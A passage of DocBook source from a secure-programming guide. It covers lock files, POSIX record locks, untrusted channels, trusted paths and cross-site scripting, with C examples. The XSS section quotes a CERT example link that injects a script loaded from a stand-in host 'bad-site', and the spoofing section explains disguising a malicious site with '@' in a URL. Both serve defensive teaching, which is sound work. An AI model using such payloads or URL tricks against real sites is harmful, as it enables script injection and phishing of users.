It also makes it easy to ``fix'' stuck locks, because an administrator
|
||
can just look at the filesystem to see what locks have been set.
|
||
Stuck locks can occur because the program failed to clean up after
|
||
itself (e.g., it crashed or malfunctioned) or because the whole system crashed.
|
||
Note that these are ``advisory'' (not ``mandatory'') locks - all processes
needing the resource must cooperate to use these locks.
|
||
<!-- ??? Discuss various approaches to resolve this, e.g.,
|
||
There are some standard tricks to simplify clean-up for these
|
||
conditions.
|
||
For example, a parent process can set a lock,
|
||
call a child to do the work (make sure only the parent can call the child
|
||
in a way that it can work), and when the child returns the parent releases
|
||
the lock.
|
||
Or, a cron job can look at the locks (which contain a process id); if
|
||
the process isn't alive, it would erase the lock and restart the process.
|
||
Finally, the lock file can be erased as part of system start-up.
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
However, there are several traps to avoid.
|
||
First, don't use the technique used by
|
||
very old Unix C programs,
|
||
which is calling creat() or its open() equivalent (open() with the flags
O_WRONLY | O_CREAT | O_TRUNC), with the file mode set to 0 (no permissions).
|
||
For normal users on normal file systems, this works, but
|
||
this approach fails to lock the file when the user has root privileges.
|
||
Root can always perform this operation, even when the file
|
||
already exists.
|
||
In fact, old versions of Unix had this particular problem in the
|
||
old editor ``ed'' -- the symptom was that
|
||
occasionally portions of the password file would be placed in users' files
|
||
[Rochkind 1985, 22]!
|
||
Instead, if you're creating a lock for processes that are on the local
|
||
filesystem, you should use open() with the flags
|
||
O_WRONLY | O_CREAT | O_EXCL (and again, no permissions, so that other
|
||
processes with the same owner won't get the lock).
|
||
Note the use of O_EXCL, which is the official way to
|
||
create ``exclusive'' files; this even works for root on a local filesystem
[Rochkind 1985, 27].
|
||
</para>
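<para>
The O_EXCL approach for a local filesystem can be sketched as follows.
This is only an illustration under stated assumptions: the function names
are hypothetical, and the lock is assumed to live on a local (not
NFS version 2) filesystem in a directory that untrusted users cannot modify.
</para>

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Try to take a lock by creating lock_path exclusively.
 * Returns 0 if we now hold the lock, 1 if the lock file already exists,
 * and -1 on any other error (errno is left as set by open()).
 */
int acquire_lock_file(const char *lock_path)
{
    /* Mode 0: no permissions, as the text recommends. */
    int fd = open(lock_path, O_WRONLY | O_CREAT | O_EXCL, 0);

    if (fd == -1)
        return (errno == EEXIST) ? 1 : -1;
    close(fd);   /* The file's existence is the lock; it need not stay open. */
    return 0;
}

/* Release the lock by removing the file. Returns 0 on success, -1 on error. */
int release_lock_file(const char *lock_path)
{
    return unlink(lock_path);
}
```

<para>
A program would call acquire_lock_file(), do its work only if the result
is 0, and call release_lock_file() when finished.
</para>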
|
||
|
||
<para>
|
||
Second, if the lock file may be on an NFS-mounted filesystem, then you have
|
||
the problem that NFS version 2 doesn't completely support normal file semantics.
|
||
This can even be a problem for work that's supposed to be ``local'' to a
|
||
client, since some clients don't have local disks and may have <emphasis remap="it">all</emphasis>
|
||
files remotely mounted via NFS.
|
||
The manual for <emphasis remap="it">open(2)</emphasis> explains how to handle things in this case
|
||
(which also handles the case of root programs):
|
||
</para>
|
||
|
||
<para>
|
||
<QUOTE>... programs which rely on
|
||
[the O_CREAT and O_EXCL flags of open(2) to work on
|
||
filesystems accessed via NFS version 2]
|
||
for performing locking tasks will contain a race condition. The solution
|
||
for performing atomic file locking using a lockfile is to create
|
||
a unique file on the same filesystem (e.g., incorporating
|
||
hostname and pid), use link(2) to make a link to
|
||
the lockfile and use stat(2) on the unique file to
|
||
check if its link count has increased to 2. Do
|
||
not use the return value of the link(2) call.</QUOTE>
|
||
</para>
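<para>
The procedure quoted above might look like the following in C.
Treat this as a sketch, not a definitive implementation: the function name
is hypothetical, and the caller is assumed to supply a unique file name
(for example, one built from the hostname and pid) on the same filesystem
as the lock file.
</para>

```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Try to take lock_path using the link(2)/stat(2) technique.
 * unique_path must be a name no other process will use, on the same
 * filesystem as lock_path.
 * Returns 0 if the lock was obtained, 1 if it is held elsewhere,
 * and -1 on error.
 */
int acquire_lock_by_link(const char *unique_path, const char *lock_path)
{
    struct stat info;
    int result;
    int fd = open(unique_path, O_WRONLY | O_CREAT | O_EXCL, 0600);

    if (fd == -1)
        return -1;
    close(fd);

    /* Deliberately ignore link()'s return value, as the manual advises. */
    (void) link(unique_path, lock_path);

    /* The link count of the unique file shows what really happened. */
    if (stat(unique_path, &info) == -1)
        result = -1;
    else
        result = (info.st_nlink == 2) ? 0 : 1;

    /* The unique name is no longer needed; the lock name (if any) remains. */
    unlink(unique_path);
    return result;
}
```

<para>
The holder releases the lock by removing the lock file with unlink(2).
</para>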
|
||
|
||
<para>
|
||
Obviously, this solution only works if all programs doing the locking
|
||
are cooperating, and if all non-cooperating programs aren't allowed to
|
||
interfere.
|
||
In particular, the directories you're using for file locking
|
||
must not have permissive file permissions for creating and removing files.
|
||
</para>
|
||
|
||
<para>
|
||
NFS version 3 added support for O_EXCL mode in open(2);
|
||
see IETF RFC 1813,
|
||
in particular the "EXCLUSIVE" value to the "mode" argument of "CREATE".
|
||
Sadly, not everyone has switched to NFS version 3 or higher at the time of this
|
||
writing, so you can't depend on this yet in portable programs.
|
||
Still, in the long run there's hope that this issue will go away.
|
||
</para>
|
||
|
||
<para>
|
||
If you're locking a device or the existence of a process on a local
|
||
machine, try to use standard conventions.
|
||
I recommend using the Filesystem Hierarchy Standard (FHS);
|
||
it is widely referenced by Linux systems, but it also tries to incorporate
|
||
the ideas of other Unix-like systems.
|
||
The FHS describes
|
||
standard conventions for such locking files, including naming, placement,
|
||
and standard contents of these files [FHS 1997].
|
||
If you just want to be sure that your server doesn't execute more than once
|
||
on a given machine, you should usually create a process identifier file named
/var/run/NAME.pid with the pid as its contents.
In a similar vein, you should place lock files for things
like devices in /var/lock.
|
||
This approach has the minor disadvantage of leaving files hanging around
|
||
if the program suddenly halts,
|
||
but it's standard practice and that problem is
|
||
easily handled by other system tools.
|
||
</para>
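<para>
Here is one way a server might create its pid file; it is a sketch under
stated assumptions. The function name is hypothetical, the path is supplied
by the caller (e.g., /var/run/NAME.pid), and the contents are written as
the pid in ASCII decimal followed by a newline, which is my reading of
the FHS convention.
</para>

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Create pid_path exclusively and write our pid into it as ASCII
 * decimal followed by a newline.
 * Returns 0 on success, -1 if the file already exists or on error.
 */
int write_pid_file(const char *pid_path)
{
    char text[32];
    int length;
    int fd = open(pid_path, O_WRONLY | O_CREAT | O_EXCL, 0644);

    if (fd == -1)
        return -1;   /* Possibly another instance is already running. */

    length = snprintf(text, sizeof(text), "%ld\n", (long) getpid());
    if (length < 0 || write(fd, text, (size_t) length) != (ssize_t) length) {
        close(fd);
        unlink(pid_path);   /* Don't leave a half-written file behind. */
        return -1;
    }
    return close(fd);
}
```

<para>
A server would call this once at start-up, refuse to run if it fails,
and remove the file when it exits normally.
</para>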
|
||
|
||
<para>
|
||
It's important that the programs which are cooperating using files to
|
||
represent the locks use the same
|
||
directory, not just the same directory name.
|
||
This is an issue with networked systems: the FHS explicitly notes that
|
||
/var/run and /var/lock are unshareable, while /var/mail is shareable.
|
||
Thus, if you want the lock to work on a single machine, but not interfere
|
||
with other machines, use unshareable directories like /var/run
|
||
(e.g., you want to permit each machine to run its own server).
|
||
However, if you want all machines sharing files in a network to obey the
|
||
lock, you need to use a directory that they're sharing; /var/mail is
|
||
one such location. See FHS section 2 for more information on this subject.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
<sect3 id="other-locking">
|
||
<title>Other Approaches to Locking</title>
|
||
|
||
<para>
|
||
Of course, you need not use files to represent locks.
|
||
Network servers often need not bother; the mere act of binding to a port
|
||
acts as a kind of lock, since if there's an existing server bound to a given
|
||
port, no other server will be able to bind to that port.
|
||
</para>
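<para>
To illustrate the port-as-lock idea, here is a small sketch for a TCP
server. The function name and the backlog value are arbitrary choices of
mine, and binding to all local addresses is just one possible policy.
</para>

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Try to become the one server on the given TCP port.
 * Returns the listening socket on success, or -1 if the port could
 * not be bound (for instance, because another server already has it).
 */
int claim_server_port(unsigned short port)
{
    struct sockaddr_in address;
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    if (fd == -1)
        return -1;

    memset(&address, 0, sizeof(address));
    address.sin_family = AF_INET;
    address.sin_addr.s_addr = htonl(INADDR_ANY);
    address.sin_port = htons(port);

    if (bind(fd, (struct sockaddr *) &address, sizeof(address)) == -1 ||
        listen(fd, 16) == -1) {
        close(fd);
        return -1;
    }
    return fd;   /* Keep this open for as long as the "lock" is needed. */
}
```

<para>
The ``lock'' is released automatically when the socket is closed or the
server process exits.
</para>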
|
||
|
||
<para>
|
||
Another approach to locking
|
||
is to use POSIX record locks, implemented through fcntl(2).
These are ``discretionary'' locks; that is, using them requires the cooperation of the
|
||
programs needing the locks (just as the approach to using files to
|
||
represent locks does).
|
||
There's a lot to recommend POSIX record locks:
|
||
POSIX record locking is supported on nearly all Unix-like platforms
|
||
(it's mandated by POSIX.1), it
|
||
can lock portions of a file (not just a whole file), and it can handle the
|
||
difference between read locks and write locks.
|
||
Even more usefully, if a process dies, its locks are automatically removed,
|
||
which is usually what is desired.
|
||
<!-- ???: What about locking across NFS, flock, lockf?
|
||
XBoing doc file "problems.txt" says that lockf() works over NFS when
|
||
lockd daemon is running. -->
|
||
</para>
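<para>
A minimal sketch of POSIX record locking with fcntl(2) follows.
The function names are hypothetical, and the file descriptor is assumed
to have been opened for writing (a write lock requires that).
</para>

```c
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Try to place a write (exclusive) lock on `length` bytes starting at
 * `start` in the open file fd, without blocking.
 * Returns 0 if the lock was granted and -1 otherwise (errno is EACCES
 * or EAGAIN when another process holds a conflicting lock).
 */
int lock_region_for_writing(int fd, off_t start, off_t length)
{
    struct flock request;

    memset(&request, 0, sizeof(request));
    request.l_type = F_WRLCK;     /* F_RDLCK would request a shared read lock. */
    request.l_whence = SEEK_SET;  /* l_start is measured from the start of the file. */
    request.l_start = start;
    request.l_len = length;       /* A length of 0 means "through end of file". */

    return fcntl(fd, F_SETLK, &request);
}

/* Release a lock on the same region. Returns 0 on success, -1 on error. */
int unlock_region(int fd, off_t start, off_t length)
{
    struct flock request;

    memset(&request, 0, sizeof(request));
    request.l_type = F_UNLCK;
    request.l_whence = SEEK_SET;
    request.l_start = start;
    request.l_len = length;

    return fcntl(fd, F_SETLK, &request);
}
```

<para>
Using F_SETLKW instead of F_SETLK would make the call wait until the
lock becomes available.
Note that these locks belong to the process, so a second request from the
same process for the same region simply succeeds.
</para>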
|
||
|
||
<para>
|
||
You can also use mandatory locks, which are based on System V's
|
||
mandatory locking scheme.
|
||
These only apply to files where the locked file's setgid bit is set, but
|
||
the group execute bit is not set.
|
||
Also, you must mount the filesystem to permit mandatory file locks.
|
||
In this case, every read(2) and write(2) is checked for locking;
|
||
while this is more thorough than advisory locks, it's also slower.
|
||
Also, mandatory locks don't port as widely to other Unix-like systems
|
||
(they're available on Linux and System V-based systems, but not necessarily
|
||
on others).
|
||
Note that processes with root privileges
|
||
can be held up by a mandatory lock, too, making it possible that
|
||
this could be the basis of a denial-of-service attack.
|
||
</para>
|
||
|
||
</sect3>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="trustworthy-channels">
|
||
<title>Trust Only Trustworthy Channels</title>
|
||
|
||
<para>
|
||
In general, only trust information (input or results)
|
||
from trustworthy channels.
|
||
For example,
|
||
the routines getlogin(3) and ttyname(3) return information that can be
|
||
controlled by a local user, so don't trust them for security purposes.
|
||
</para>
|
||
|
||
<para>
|
||
In most computer networks (and certainly for the Internet at large),
|
||
no unauthenticated transmission is trustworthy.
|
||
For example,
|
||
packets sent over the public Internet can be viewed and modified at any
|
||
point along their path, and arbitrary new packets can be forged.
|
||
These forged packets might include forged information about the sender
|
||
(such as their machine (IP) address and port) or receiver.
|
||
Therefore, don't use these values as your primary criteria for
|
||
security decisions unless you can authenticate them (say using cryptography).
|
||
</para>
|
||
|
||
<para>
|
||
This means that, except under special circumstances,
|
||
two old techniques for authenticating users
|
||
in TCP/IP should often not be used as the sole authentication mechanism.
|
||
One technique is to limit users to ``certain machines'' by checking
|
||
the ``from'' machine address in a data packet; the other is to
|
||
limit access by requiring that the sender use a ``trusted'' port number
|
||
(a number less than 1024).
|
||
The problem is that in many environments an attacker can forge these values.
|
||
</para>
|
||
|
||
<para>
|
||
In some environments, checking these values (e.g., the sending machine
|
||
IP address and/or port) can have some value, so
|
||
it's not a bad idea to support such checking as an option in a program.
|
||
For example, if a system runs behind a firewall, the firewall can't
|
||
be breached or circumvented, and the firewall stops
|
||
external packets that claim to be from the inside,
|
||
then you can claim that any packet saying it's from the inside really does.
|
||
Note that you can't be sure the packet actually comes from the machine
|
||
it claims it comes from - so you're only countering external threats,
|
||
not internal threats.
|
||
However, broken firewalls, alternative paths, and mobile code make
|
||
even these assumptions suspect.
|
||
</para>
|
||
|
||
<para>
|
||
The problem is supporting untrustworthy information as the only way
|
||
to authenticate someone.
|
||
If you need a trustworthy channel over an untrusted network,
|
||
in general you need some sort of cryptographic
service (at the very least, a cryptographically safe hash).
|
||
See <xref linkend="crypto">
|
||
for more information on cryptographic algorithms and protocols.
|
||
If you're implementing a standard and inherently insecure protocol
|
||
(e.g., ftp and rlogin), provide safe defaults and document
|
||
the assumptions clearly.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
The Domain Name System (DNS) is widely used on the Internet to maintain
|
||
mappings between the names of computers and their IP (numeric) addresses.
|
||
The technique called ``reverse DNS'' eliminates some simple
|
||
spoofing attacks, and is useful for determining a host's name.
|
||
However, this technique is not trustworthy for authentication decisions.
|
||
The problem is that a DNS request will eventually be sent
to some remote system that may be controlled by an attacker.
Therefore, treat DNS results as input that needs
validation, and don't trust them for serious access control.
|
||
</para>
|
||
|
||
<para>
|
||
Arbitrary email (including the ``from'' value of addresses)
|
||
can be forged as well.
|
||
Using digital signatures is a method to thwart many such attacks.
|
||
A more easily thwarted approach is to require emailing back and forth
|
||
with special randomly-created values, but for low-value transactions
|
||
such as signing onto a public mailing list this is usually acceptable.
|
||
</para>
|
||
|
||
<para>
|
||
Note that in any client/server model, including CGI, the server
|
||
must assume that the client (or someone interposing between the
|
||
client and server) can modify any value.
|
||
For example, so-called ``hidden fields'' and cookie values can be
|
||
changed by the client before being received by CGI programs.
|
||
These cannot be trusted unless special precautions are taken.
|
||
For example, the hidden fields could be signed in a way the client
|
||
cannot forge as long as the server checks the signature.
|
||
The hidden fields could also be encrypted using a key only the trusted
|
||
server could decrypt (this latter approach is the basic idea behind the
|
||
Kerberos authentication system).
|
||
InfoSec labs has further discussion about hidden fields and applying
|
||
encryption at
|
||
<ulink url="http://www.infoseclabs.com/mschff/mschff.htm">http://www.infoseclabs.com/mschff/mschff.htm</ulink>.
|
||
In general, you're better off keeping data you care about at the server end
|
||
in a client/server model.
|
||
In the same vein,
|
||
don't depend on HTTP_REFERER for authentication in a CGI program, because
|
||
this is sent by the user's browser (not the web server).
|
||
</para>
|
||
|
||
<para>
|
||
This issue applies to data referencing other data, too.
|
||
For example, HTML or XML allow you to include by reference other files
|
||
(e.g., DTDs and style sheets) that may be stored remotely.
|
||
However, those external references could be modified so that users
|
||
see a very different document than intended;
|
||
a style sheet could be modified to ``white out'' words at critical
|
||
locations, deface its appearance, or insert new text.
|
||
External DTDs could be modified to prevent use of the document
|
||
(by adding declarations that break validation) or insert different
|
||
text into documents [St. Laurent 2000].
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="trusted-path">
|
||
<title>Set up a Trusted Path</title>
|
||
<para>
|
||
The counterpart to needing trustworthy channels
|
||
(see <xref linkend="trustworthy-channels">)
|
||
is assuring users that they
|
||
really are working with the program or system they intended to use.
|
||
</para>
|
||
|
||
<para>
|
||
The traditional example is a ``fake login'' program.
|
||
If a program is written to look like the login screen of a system, then
|
||
it can be left running.
|
||
When users try to log in, the fake login program can then capture user
|
||
passwords for later use.
|
||
</para>
|
||
|
||
<para>
|
||
A solution to this problem is a ``trusted path.''
|
||
A trusted path is simply some mechanism that provides confidence that the
|
||
user is communicating with what the user intended to communicate with,
|
||
ensuring that attackers can't intercept or modify whatever information
|
||
is being communicated.
|
||
<!-- A gross simplification of the CC. See:
|
||
http://www.commoncriteria.org/cc/part2/part2anftp.html -->
|
||
</para>
|
||
|
||
<para>
|
||
If you're asking for a password, try to set up a trusted path.
|
||
Unfortunately, stock Linux distributions and many other Unixes don't
|
||
have a trusted path even for their normal login sequence.
|
||
One approach is to
|
||
require pressing an unforgeable key before login, e.g.,
|
||
Windows NT/2000 uses ``control-alt-delete'' before logging in; since
|
||
normal programs in Windows can't intercept this key pattern, this
|
||
approach creates a trusted path.
|
||
There's a Linux equivalent, termed the
|
||
<ulink url="http://lwn.net/2001/0322/a/SAK.php3">Secure Attention Key
|
||
(SAK)</ulink>; it's recommended that this be mapped to
|
||
``control-alt-pause''.
|
||
Unfortunately, at the time of this writing SAK is immature and not
|
||
well-supported by Linux distributions.
|
||
Another approach for implementing a trusted path
locally is to use a separate display that only the login
program can control.
|
||
For example, if only trusted programs could modify the keyboard lights
|
||
(the LEDs showing Num Lock, Caps Lock, and Scroll Lock),
|
||
then a login program could display a running pattern to indicate that
|
||
it's the real login program.
|
||
Unfortunately, since in current Linux normal users can change the LEDs,
|
||
the LEDs can't currently be used to confirm a trusted path.
|
||
</para>
|
||
|
||
<para>
|
||
Sadly, the problem is much worse for network applications.
|
||
Although setting up a trusted path is desirable for network applications,
|
||
completely doing so is quite difficult.
|
||
When sending a password over a network, at the very least
|
||
encrypt the password between trusted endpoints.
|
||
This will at least prevent eavesdropping of passwords by those not
|
||
connected to the system, and at least make attacks harder to perform.
|
||
If you're concerned about trusted path for the actual communication, make
|
||
sure that the communication is
|
||
encrypted and authenticated (or at least authenticated).
|
||
</para>
|
||
|
||
<para>
|
||
It turns out that this isn't enough to have a trusted path
|
||
to networked applications, in particular for web-based applications.
|
||
There are documented methods for fooling users of web browsers into thinking
|
||
that they're at one place when they are really at another.
|
||
For example, Felten [1997] discusses ``web spoofing'',
|
||
where users believe they're viewing one web page when in fact all the
|
||
web pages they view go through an attacker's site (who can then monitor
|
||
all traffic and modify any data sent in either direction).
|
||
This is accomplished by rewriting URLs.
|
||
The rewritten URLs can be made nearly invisible
|
||
by using other technology (such as Javascript) to hide any possible
|
||
evidence in the status line, location line, and so on.
|
||
See their paper for more details.
|
||
Another technique for hiding such URLs is exploiting rarely-used URL
|
||
syntax, for example, the URL
|
||
``http://www.ibm.com/stuff@mysite.com''
|
||
is actually a request to view ``mysite.com'' (a potentially malevolent site)
|
||
using the unusual username ``www.ibm.com/stuff''.
|
||
If the URL is long enough,
|
||
the real material won't be displayed and users are unlikely to
|
||
notice the exploit anyway.
|
||
Yet another approach is to create sites with names deliberately similar
|
||
to the ``real'' site - users may not know the difference.
|
||
In all of these cases, simply encrypting the line doesn't help -
|
||
the attacker can be quite content in encrypting data while completely
|
||
controlling what's shown.
|
||
</para>
|
||
|
||
<para>
|
||
Countering these problems is more difficult;
|
||
at this time I have no good technical solution for fully preventing
|
||
``fooled'' web users.
|
||
I would encourage web browser developers to counter such ``fooling'',
|
||
making it easier to spot.
|
||
If it's critical that your users connect to the correct site,
|
||
have them use simple procedures to counter the threat.
|
||
Examples include having them halt and restart their browser, and making sure
|
||
that the web address is very simple and not normally misspelled
|
||
(so misspelling it is unlikely).
|
||
You might also want to gain ownership of some ``similar'' sounding DNS names,
|
||
and search for other such DNS names and material to find attackers.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="internal-check">
|
||
<title>Use Internal Consistency-Checking Code</title>
|
||
|
||
<para>
|
||
The program should check to ensure that its call arguments and basic state
|
||
assumptions are valid.
|
||
In C, macros such as assert(3) may be helpful in doing so.
|
||
<!-- ??? See programming by contract, championed in Eiffel,
|
||
and info on formal proofs. -->
|
||
</para>
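<para>
For instance, a small routine might check its arguments and a basic
state assumption like this (the routine itself is a made-up example,
not something from a particular library):
</para>

```c
#include <assert.h>
#include <stddef.h>

/*
 * Copy at most dest_size - 1 bytes of src into dest and terminate it.
 * Returns the number of bytes copied (not counting the terminator).
 */
size_t copy_bounded(char *dest, size_t dest_size, const char *src)
{
    size_t i;

    /* Check the call arguments before using them. */
    assert(dest != NULL);
    assert(src != NULL);
    assert(dest_size > 0);

    for (i = 0; i + 1 < dest_size && src[i] != '\0'; i++)
        dest[i] = src[i];
    dest[i] = '\0';

    /* Check a basic state assumption: the terminator landed inside dest. */
    assert(i < dest_size);
    return i;
}
```

<para>
Keep in mind that assert(3) compiles to nothing when NDEBUG is defined,
so checks that must hold in production builds need ordinary error-handling
code as well.
</para>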
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="self-limit-resources">
|
||
<title>Self-limit Resources</title>
|
||
|
||
<para>
|
||
In network daemons, shed or limit excessive loads.
|
||
Set limit values (using setrlimit(2)) to limit the resources that will be used.
|
||
At the least, use setrlimit(2) to disable creation of ``core'' files.
|
||
For example, by default
|
||
Linux will create a core file that saves all program memory if the
|
||
program fails abnormally, but such a file might include passwords or
|
||
other sensitive data.
|
||
</para>
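<para>
Disabling core files with setrlimit(2) takes only a few lines.
The following is a sketch; the function name is hypothetical, and a real
daemon would probably set other limits at the same point.
</para>

```c
#include <sys/resource.h>
#include <sys/time.h>

/*
 * Forbid core files for this process (children inherit the limit).
 * Returns 0 on success, -1 on error.
 */
int disable_core_files(void)
{
    struct rlimit no_core;

    no_core.rlim_cur = 0;   /* Soft limit: maximum core file size of 0 bytes. */
    no_core.rlim_max = 0;   /* Hard limit: an unprivileged process cannot raise it again. */
    return setrlimit(RLIMIT_CORE, &no_core);
}
```

<para>
Call this early, before the program reads passwords or other
sensitive data into memory.
</para>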
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="cross-site-malicious-content">
|
||
<title>Prevent Cross-Site (XSS) Malicious Content</title>
|
||
<para>
|
||
Some secure programs accept data from one untrusted user (the attacker)
|
||
and pass that data on to a different user's application (the victim).
|
||
If the secure program doesn't protect the victim, the
|
||
victim's application (e.g., their web browser)
|
||
may then process that data in a way harmful to the victim.
|
||
This is a particularly common problem for web applications using HTML or XML,
|
||
where the problem goes by several names including ``cross-site scripting'',
|
||
``malicious HTML tags'', and ``malicious content.''
|
||
This book will call this problem ``cross-site malicious content,''
|
||
since the problem isn't limited to scripts or HTML, and its cross-site nature
|
||
is fundamental.
|
||
Note that this problem isn't limited to web applications, but since
|
||
this is a particular problem for them, the rest of this discussion
|
||
will emphasize web applications.
|
||
As will be shown in a moment, sometimes an attacker can cause a victim
|
||
to send data from the victim to the secure program, so the secure program
|
||
must protect the victim from himself.
|
||
</para>
|
||
|
||
<sect2 id="explain-cross-site">
|
||
<title>Explanation of the Problem</title>
|
||
|
||
<para>
|
||
Let's begin with a simple example.
|
||
Some web applications are designed to
|
||
permit HTML tags in data input from users that will later
|
||
be posted to other readers (e.g., in a guestbook or ``reader comment'' area).
|
||
If nothing is done to prevent it,
|
||
these tags can be used by malicious users to attack other users by inserting
|
||
scripts,
|
||
Java references (including references to hostile applets), DHTML tags,
|
||
early document endings (via &lt;/HTML&gt;), absurd font size requests,
|
||
and so on.
|
||
This capability can be exploited for a wide range of effects,
|
||
such as exposing SSL-encrypted connections, accessing restricted web
|
||
sites via the client, violating domain-based security policies,
|
||
making the web page unreadable,
|
||
making the web page unpleasant to use (e.g., via annoying banners
|
||
and offensive material),
|
||
permitting privacy intrusions (e.g., by inserting a web bug to learn exactly
|
||
who reads a certain page),
|
||
creating
|
||
denial-of-service attacks (e.g., by creating an ``infinite'' number
|
||
of windows), and even very destructive attacks (by inserting
|
||
attacks on security vulnerabilities such as scripting languages or
|
||
buffer overflows in browsers).
|
||
By embedding malicious FORM tags at the right place, an intruder
|
||
may even be able to trick users into revealing sensitive information
|
||
(by modifying the behavior of an existing form).
|
||
Or, by embedding scripts, an intruder can cause no end of problems.
|
||
This is by no means an exhaustive list of problems, but
|
||
hopefully this is enough to convince you that this is a serious problem.
|
||
</para>
|
||
|
||
<para>
|
||
Most ``discussion boards'' have already discovered this problem,
|
||
and most already take steps to prevent it in text intended to be part of
|
||
a multiperson discussion.
|
||
Unfortunately, many web application developers don't
|
||
realize that this is a much more general problem.
|
||
<emphasis>Every</emphasis> data value that is sent from one
|
||
user to another can potentially be a source for cross-site
|
||
malicious posting, even if it's not an ``obvious'' case of an area
|
||
where arbitrary HTML is expected.
|
||
The malicious data can even be supplied by the user himself, since the
|
||
user may have been fooled into supplying the data via another site.
|
||
Here's an example (from CERT) of an HTML link that causes the user to
|
||
send malicious data to another site:
|
||
<programlisting>
|
||
 &lt;A HREF="http://example.com/comment.cgi?mycomment=&lt;SCRIPT
 SRC='http://bad-site/badfile'&gt;&lt;/SCRIPT&gt;"&gt; Click here&lt;/A&gt;
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
In short, a web application cannot accept input (including any form data)
|
||
without checking, filtering, or encoding it.
|
||
You can't even pass that data back to the same user in many cases
|
||
in web applications, since another user may have surreptitiously
|
||
supplied the data.
|
||
Even if permitting such material won't hurt your system, it will
|
||
enable your system to be a conduit of attacks to your users.
|
||
Even worse, those attacks will appear to be coming from your system.
|
||
</para>
|
||
|
||
<para>
|
||
CERT describes the problem this way in their advisory:
|
||
<blockquote><para>
|
||
A web site may inadvertently include malicious HTML tags or script
|
||
in a dynamically generated page based on unvalidated input
|
||
from untrustworthy sources
|
||
(<ulink url="http://www.cert.org/advisories/CA-2000-02.html">CERT Advisory
|
||
CA-2000-02, Malicious HTML Tags Embedded in Client Web Requests</ulink>).
|
||
</para></blockquote>
|
||
More information from CERT about this is available at
|
||
<ulink url="http://www.cert.org/archive/pdf/cross_site_scripting.pdf">
|
||
http://www.cert.org/archive/pdf/cross_site_scripting.pdf</ulink>.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="solutions-cross-site">
|
||
<title>Solutions to Cross-Site Malicious Content</title>
|
||
<para>
|
||
Fundamentally, this means that all web application output impacted
|
||
by any user must be
|
||
filtered (so characters that can cause this problem are removed),
|
||
encoded (so the characters that can cause this problem are encoded in
|
||
a way to prevent the problem), or
|
||
validated (to ensure that only ``safe'' data gets through).
|
||
This includes all output derived from
|
||
input such as URL parameters, form data, cookies,
|
||
database queries, CORBA ORB results, and data from users stored in files.
|
||
In many cases,
|
||
filtering and validation should be done at the input, but
|
||
encoding can be done during either input validation or output generation.
|
||
If you're just passing the data through without analysis, it's probably
|
||
better to encode the data on input (so it won't be forgotten).
|
||
However, if your program processes the data,
|
||
it can be easier to encode it on output instead.
|
||
CERT recommends that filtering and encoding be done during data output;
|
||
this isn't a bad idea, but there are many cases where it makes sense to do it
|
||
at input instead.
|
||
The critical issue is to make sure that you cover all cases for
|
||
every output, which is not an easy thing to do regardless of approach.
|
||
</para>
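<para>
As an illustration of the ``encoded'' option, here is a sketch of an
output encoder for text placed in HTML element content or in a quoted
attribute value.
The function name and interface are my own invention for this example,
and it assumes the page's character encoding is already under your control.
It encodes the less-than, greater-than, ampersand, and both quote characters.
</para>

```c
#include <stddef.h>
#include <string.h>

/*
 * Write an HTML-encoded copy of input into output (capacity output_size).
 * Returns 0 on success, or -1 if the encoded text would not fit; in that
 * case output is set to the empty string rather than truncated.
 */
int html_encode(const char *input, char *output, size_t output_size)
{
    size_t used = 0;

    if (output_size == 0)
        return -1;

    for (; *input != '\0'; input++) {
        const char *replacement;
        char literal[2] = { *input, '\0' };
        size_t length;

        switch (*input) {
        case '<':  replacement = "&lt;";   break;
        case '>':  replacement = "&gt;";   break;
        case '&':  replacement = "&amp;";  break;
        case '"':  replacement = "&quot;"; break;
        case '\'': replacement = "&#39;";  break;
        default:   replacement = literal;  break;
        }

        length = strlen(replacement);
        if (length >= output_size - used) {   /* Leave room for the terminator. */
            output[0] = '\0';
            return -1;
        }
        memcpy(output + used, replacement, length);
        used += length;
    }
    output[used] = '\0';
    return 0;
}
```

<para>
Failing outright when the buffer is too small, instead of truncating,
avoids emitting half of an entity.
This encoder is not sufficient for data placed inside URLs or scripts,
which have their own special characters.
</para>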
|
||
|
||
<para>
|
||
Warning - in many cases these techniques can be subverted unless you've also
|
||
gained control over the character encoding of the output.
|
||
Otherwise, an attacker could use an ``unexpected'' character encoding
|
||
to subvert the techniques discussed here.
|
||
Thankfully, this isn't hard;
|
||
gaining control over output character encoding is discussed in
|
||
<xref linkend="output-character-encoding">.
|
||
</para>
|
||
|
||
<para>
|
||
One minor defense, that's often worth doing, is the "HttpOnly" flag for
|
||
cookies.
|
||
Scripts that run in a web browser cannot access cookie values
|
||
that have the HttpOnly flag set (they just get an empty value instead).
|
||
This is currently implemented in
|
||
Microsoft Internet Explorer, and I expect
|
||
Mozilla/Netscape to implement this soon too.
|
||
<!-- http://online.securityfocus.com/archive/1/299331/2002-11-09/2002-11-15/0 -->
|
||
<!-- http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure10102002.asp -->
|
||
You should set HttpOnly for any cookie you send, unless you have
|
||
scripts that need the cookie, to counter certain kinds of cross-site
|
||
scripting (XSS) attacks.
|
||
However, the HttpOnly flag can be circumvented in a variety of ways,
so using it as your primary defense is inappropriate.
|
||
Instead, it's a helpful secondary defense that may help save you in
|
||
case your application is written incorrectly.
|
||
<!-- See http://www.whitehatsec.com/news.html
|
